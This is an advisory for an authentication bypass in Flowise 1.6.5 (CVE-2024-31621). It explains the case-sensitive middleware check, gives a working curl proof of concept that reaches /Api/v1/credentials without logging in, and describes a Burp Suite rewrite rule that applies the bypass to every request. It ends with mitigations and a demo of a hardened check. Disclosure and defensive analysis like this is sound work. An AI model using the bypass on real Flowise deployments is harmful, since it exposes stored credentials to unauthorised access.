Vendor: Flowise
By: Maerifat Majeed
CVSS: 6.1 (HIGH)
Type: Authentication Bypass
CWE: 287 (Improper Authentication)
Product Name: Flowise
Affected Version From: not stated (the advisory says 1.6.5 and below)
Affected Version To: 1.6.5
Patch Exists: NO
Related CVE: CVE-2024-31621
CPE: a:flowiseai:flowise:1.6.5
Platforms Tested: mac-os
Year: 2024

Flowise 1.6.5 – Authentication Bypass

Flowise version 1.6.5 and below is susceptible to an authentication bypass. The authentication middleware decides whether to enforce basic auth with a case-sensitive substring check, req.url.includes('/api/v1/'), while Express matches routes case-insensitively by default. A request whose path uses different casing, such as /API/V1/credentials instead of /api/v1/credentials, therefore skips the middleware but still reaches the same handler, and the attacker receives the response without supplying any credentials.

Mitigation:

The authentication check and the router must compare paths the same way. Either normalise the request path before the check (drop the query string, lower-case it, and apply the same normalisation to the whitelist comparison) so that /API/V1/... is gated exactly like /api/v1/..., or mount the middleware on the route prefix (app.use('/api/v1', ...)) so it inherits the router's matching rules, or enable Express's case-sensitive routing so that /API/V1/... no longer resolves to the handler at all. Regular security testing and code review of authentication middleware help catch this class of flaw.

Exploit-DB raw data:

# Exploit Title: Flowise 1.6.5 - Authentication Bypass
# Date: 17-April-2024
# Exploit Author: Maerifat Majeed
# Vendor Homepage: https://flowiseai.com/
# Software Link: https://github.com/FlowiseAI/Flowise/releases
# Version: 1.6.5
# Tested on: mac-os
# CVE : CVE-2024-31621

Flowise version <= 1.6.5 is vulnerable to an authentication bypass.
The code snippet

this.app.use((req, res, next) => {
    // Case-sensitive substring check on the raw request URL
    if (req.url.includes('/api/v1/')) {
        // Whitelisted endpoints pass straight through; everything else must authenticate
        whitelistURLs.some((url) => req.url.includes(url)) ? next() : basicAuthMiddleware(req, res, next)
    } else next()
})

puts the authentication middleware in front of every endpoint under /api/v1
except a few whitelisted ones. But the check is case-sensitive, so it only
matches a lowercase /api/v1. Anyone who rewrites the path in uppercase, such
as /API/V1, bypasses the authentication.

POC:

curl http://localhost:3000/Api/v1/credentials

For a seamless bypass across the whole application, use the Burp Suite Match and Replace
feature in the proxy settings: add a rule on the request first line replacing api/v1 with API/V1.
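The following is an added example, not Flowise's code and not part of the advisory above. It models the gate from the snippet (the case-sensitive req.url.includes('/api/v1/') check) next to a hardened variant, and simulates Express-style route matching, to show why a request for /API/V1/credentials reaches the handler without credentials and how each of the mitigations listed earlier closes it. The function names (requiresAuthVulnerable, requiresAuthHardened, routeMatches, dispatch) and the single whitelist entry are hypothetical; the request paths are constructed for the demonstration.

```javascript
// Added example, not Flowise's code. Models the auth gate from the advisory
// and a hardened variant alongside Express-style route matching, to show why
// /API/V1/credentials is served with no credentials. Function names and the
// whitelist entry are hypothetical.

// Constructed whitelist in the same shape as the snippet's whitelistURLs.
const whitelistURLs = ['/api/v1/public/'];

// Gate as written in the vulnerable snippet: a case-sensitive substring
// check on the raw req.url (query string included).
function requiresAuthVulnerable(url) {
  if (url.includes('/api/v1/')) {
    return !whitelistURLs.some((w) => url.includes(w));
  }
  return false;
}

// Hardened gate: compare on the pathname only (query string and fragment are
// not part of the route) after lower-casing it, so the gate is at least as
// lenient as Express's default case-insensitive router. The whitelist is
// compared with the same normalised pathname.
function requiresAuthHardened(url) {
  const pathname = url.split(/[?#]/, 1)[0].toLowerCase();
  if (!pathname.startsWith('/api/v1/')) return false;
  return !whitelistURLs.some((w) => pathname.startsWith(w));
}

// Express-style route matching. With 'case sensitive routing' disabled (the
// default), /API/V1/credentials and /api/v1/credentials are the same route.
function routeMatches(url, routePath, caseSensitive) {
  const pathname = url.split(/[?#]/, 1)[0];
  return caseSensitive
    ? pathname === routePath
    : pathname.toLowerCase() === routePath.toLowerCase();
}

// Middleware order as in the snippet: the gate runs before the routes.
// Returns the HTTP status an unauthenticated client would receive.
function dispatch(url, gate, caseSensitive = false) {
  if (gate(url)) return 401; // basicAuthMiddleware would challenge here
  return routeMatches(url, '/api/v1/credentials', caseSensitive) ? 200 : 404;
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const url of ['/api/v1/credentials', '/Api/v1/credentials', '/API/V1/credentials?x=1']) {
    console.log(url,
      'vulnerable gate:', dispatch(url, requiresAuthVulnerable),
      'hardened gate:', dispatch(url, requiresAuthHardened),
      'case-sensitive routing:', dispatch(url, requiresAuthVulnerable, true));
  }
}
```

Run with node: the lowercase path is challenged (401) by both gates, the mixed-case path is served (200) through the vulnerable gate and challenged by the hardened one, and with case-sensitive routing the mixed-case path simply stops resolving to the handler (404). Turning on case-sensitive routing is the smallest change, but it alters which URLs the application answers at all, so normalising the path in the gate is the safer first fix.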